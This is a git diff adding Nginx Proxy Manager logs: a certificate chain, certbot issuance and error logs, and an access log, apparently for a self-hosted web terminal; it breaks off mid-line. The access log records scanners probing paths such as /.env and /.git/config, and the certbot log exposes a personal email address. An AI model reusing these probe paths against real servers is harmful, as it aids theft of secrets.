+AQQB1nkCBAIEgfYEgfMA8QB2AGQRxGykEuyniRyiAi4AvKtPKAfUHjUnq+r+1QPJ +fc3wAAABm1L3po0AAAQDAEcwRQIhAIaBbekiGNH3VwK+0blluRg0ZF+TqlpYNS6n +gHVGknS5AiAlf4XqzsZ7R8ll9kuRuHQSvNJt2oWqbqhO/QYKOYyVvgB3ABaDLavw +qSUPD/A6pUX/yL/II9CHS/YEKSf45x8zE/X6AAABm1L3pssAAAQDAEgwRgIhALO+ +h8r/WKEmISSWiJN9NultaFsjdoo48Av1kaCIFr1qAiEAqagsPtEZaBoP3o2PjCiK +TaRpmAlz01MHB33/KtY+ypcwCgYIKoZIzj0EAwMDaAAwZQIxAJkyq8FKvLC1CccV +suvITXKzeEnMc1sqDeuA7GX7qV8u+uYh2WPhJR4Jmrr0G1Te/AIwan5OaiJCBi1B +mCBKjprv4A9a+nlRZPjDtCahyDSnGdhkDmGrIpmYG2RVFFP/nmQN +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw +CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg +R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y +NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy +eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM +ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET +oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO +BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG +A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK +MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw +JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK +MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v +cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls +5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4 +4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg== +-----END CERTIFICATE----- + +2025-12-25 00:45:22,134:DEBUG:acme.client:Storing nonce: fULB7aUJv71UoqiAy7y6JIBGSqx2utdEVh60TA0v0oC7Tlpflm8 +2025-12-25 00:45:22,136:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2025-12-25 00:45:22,136:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-11. +2025-12-25 00:45:22,137:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-11. +2025-12-25 00:45:22,138:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-11/cert.pem. +2025-12-25 00:45:22,138:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-11/privkey.pem. +2025-12-25 00:45:22,138:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-11/chain.pem. +2025-12-25 00:45:22,138:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-11/fullchain.pem. +2025-12-25 00:45:22,138:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-11/README. +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:45:22,146:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2025-12-25 00:45:22,146:DEBUG:certbot.configuration:Var webroot_map={'profibot.synology.me': '/data/letsencrypt-acme-challenge'} (set by user). +2025-12-25 00:45:22,147:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-11/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-11/privkey.pem +This certificate expires on 2026-03-24. +These files will be updated when the certificate renews. +2025-12-25 00:45:22,148:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2025-12-25 00:45:22,148:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2025-12-25 00:45:22,149:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.9 b/proxy-manager/data/logs/letsencrypt.log.9 new file mode 100755 index 0000000..6082821 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.9 @@ -0,0 +1,137 @@ +2025-12-25 00:27:04,269:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 00:27:04,269:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 00:27:04,269:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-10', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'NAS'] +2025-12-25 00:27:04,269:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 00:27:04,279:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 00:27:04,280:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:27:04,280:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 00:27:04,280:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 00:27:04,280:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 00:27:04,317:DEBUG:certbot._internal.main:Picked account: +2025-12-25 00:27:04,317:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 00:27:04,319:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 00:27:04,752:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 00:27:04,753:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:27:04 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "Tlfqb6mw68E": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 00:27:04,754:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for nas +2025-12-25 00:27:04,760:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 00:27:04,760:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 00:27:04,904:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 00:27:04,905:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:27:04 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlS7jW4VsaUWGJUxUF7WVgLXG3f9YPiQyxdYqaNqDBUANE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 00:27:04,905:DEBUG:acme.client:Storing nonce: IijzadlS7jW4VsaUWGJUxUF7WVgLXG3f9YPiQyxdYqaNqDBUANE +2025-12-25 00:27:04,906:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "nas"\n }\n ]\n}' +2025-12-25 00:27:04,910:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsUzdqVzRWc2FVV0dKVXhVRjdXVmdMWEczZjlZUGlReXhkWXFhTnFEQlVBTkUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "lb2vHfDE3JzPMYTwZSRVTKED0X-FIUR45GohsnELwt3aIuoQ2w6kVlO6fqQxaqBpjwg35QrhtPYMocBZYJw_YHCWM750UgTxE1QQgbMeiK8mgO1_dlvKn2hoAhx4TSErKhiDII6aBz9RrGCtjUsVCq6syACVl2DXhNC63fo9pG49CsMy7Hzu3U0s1klDQWNVf8XIDwAoHQomi7IWTQC3vA5kbXtvjtnwwgDJf3SFjkv4rf0DrvkkuK87tbzF0lUOdshBb7PV3LDWRXVbUHT296aD3zJDCLPuOACq5birBFDOtWiETyObEkAM0PVoIHxAW43r24nrityjsHnGG-mkTQ", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5hcyIKICAgIH0KICBdCn0" +} +2025-12-25 00:27:05,053:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 400 187 +2025-12-25 00:27:05,053:DEBUG:acme.client:Received response: +HTTP 400 +Server: nginx +Date: Thu, 25 Dec 2025 00:27:04 GMT +Content-Type: application/problem+json +Content-Length: 187 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlS3tHSW5fpjrWY9TYZft_YFu_1arC1zzjLJY5GvWD7Mkw + +{ + "type": "urn:ietf:params:acme:error:rejectedIdentifier", + "detail": "Invalid identifiers requested :: Cannot issue for \"nas\": Domain name needs at least one dot", + "status": 400 +} +2025-12-25 00:27:05,055:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 487, in _get_order_and_authorizations + orderr = self.acme.new_order(csr_pem, profile=profile) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 141, in new_order + response = self._post(self.directory['newOrder'], order) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 467, in _post + return self.net.post(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 818, in post + return self._post_once(*args, **kwargs) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 833, in _post_once + response = self._check_response(response, content_type=content_type) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/acme/client.py", line 705, in _check_response + raise messages.Error.from_json(jobj) +acme.messages.Error: urn:ietf:params:acme:error:rejectedIdentifier :: The server will not issue certificates for the identifier :: Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot +2025-12-25 00:27:05,061:ERROR:certbot._internal.log:An unexpected error occurred: +2025-12-25 00:27:05,061:ERROR:certbot._internal.log:Invalid identifiers requested :: Cannot issue for "nas": Domain name needs at least one dot diff --git a/proxy-manager/data/logs/proxy-host-10_access.log b/proxy-manager/data/logs/proxy-host-10_access.log new file mode 100755 index 0000000..ac55bb4 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-10_access.log @@ -0,0 +1,4178 @@ +[27/Jan/2026:23:22:16 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:16 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:16 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:16 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:18 +0000] - - 301 - HEAD http terminal.profibot.hu "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0" "-" +[27/Jan/2026:23:22:18 +0000] - - 502 - HEAD https terminal.profibot.hu "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0" "http://terminal.profibot.hu" +[27/Jan/2026:23:22:19 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "-" "-" +[27/Jan/2026:23:22:20 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "-" "-" +[27/Jan/2026:23:22:20 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:20 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:21 +0000] - - 502 - GET https terminal.profibot.hu "/server" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:21 +0000] - - 301 - GET http terminal.profibot.hu "/server" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:22 +0000] - - 502 - GET https terminal.profibot.hu "/server-status" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:22 +0000] - - 301 - GET http terminal.profibot.hu "/server-status" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:22 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:22 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:22 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:22 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:22:24 +0000] - - 502 - GET https terminal.profibot.hu "/about" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:24 +0000] - - 301 - GET http terminal.profibot.hu "/about" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:25 +0000] - - 301 - GET http terminal.profibot.hu "/login.action" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:25 +0000] - - 502 - GET https terminal.profibot.hu "/login.action" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:26 +0000] - - 301 - GET http terminal.profibot.hu "/_all_dbs" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:26 +0000] - - 502 - GET https terminal.profibot.hu "/_all_dbs" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:27 +0000] - - 301 - GET http terminal.profibot.hu "/v2/_catalog" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:27 +0000] - - 502 - GET https terminal.profibot.hu "/v2/_catalog" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:28 +0000] - - 301 - GET http terminal.profibot.hu "/.DS_Store" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:28 +0000] - - 502 - GET https terminal.profibot.hu "/.DS_Store" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:29 +0000] - - 301 - GET http terminal.profibot.hu "/.env" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:29 +0000] - - 502 - GET https terminal.profibot.hu "/.env" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:31 +0000] - - 301 - GET http terminal.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:31 +0000] - - 502 - GET https terminal.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:33 +0000] - - 301 - GET http terminal.profibot.hu "/.git/config" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:34 +0000] - - 502 - GET https terminal.profibot.hu "/.git/config" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:34 +0000] - - 301 - POST http terminal.profibot.hu "/graphql" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:35 +0000] - - 301 - POST http terminal.profibot.hu "/api" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:35 +0000] - - 502 - POST https terminal.profibot.hu "/graphql" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:36 +0000] - - 301 - POST http terminal.profibot.hu "/api/graphql" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:36 +0000] - - 502 - POST https terminal.profibot.hu "/api" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:36 +0000] - - 301 - POST http terminal.profibot.hu "/graphql/api" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:37 +0000] - - 301 - POST http terminal.profibot.hu "/api/gql" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:37 +0000] - - 502 - POST https terminal.profibot.hu "/api/graphql" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:37 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:38 +0000] - - 502 - POST https terminal.profibot.hu "/graphql/api" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:38 +0000] - - 301 - GET http terminal.profibot.hu "/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:39 +0000] - - 502 - POST https terminal.profibot.hu "/api/gql" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:39 +0000] - - 301 - GET http terminal.profibot.hu "/config.json" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:40 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:41 +0000] - - 502 - GET https terminal.profibot.hu "/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:41 +0000] - - 301 - GET http terminal.profibot.hu "/telescope/requests" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:42 +0000] - - 301 - GET http terminal.profibot.hu "/info.php" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:42 +0000] - - 502 - GET https terminal.profibot.hu "/config.json" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 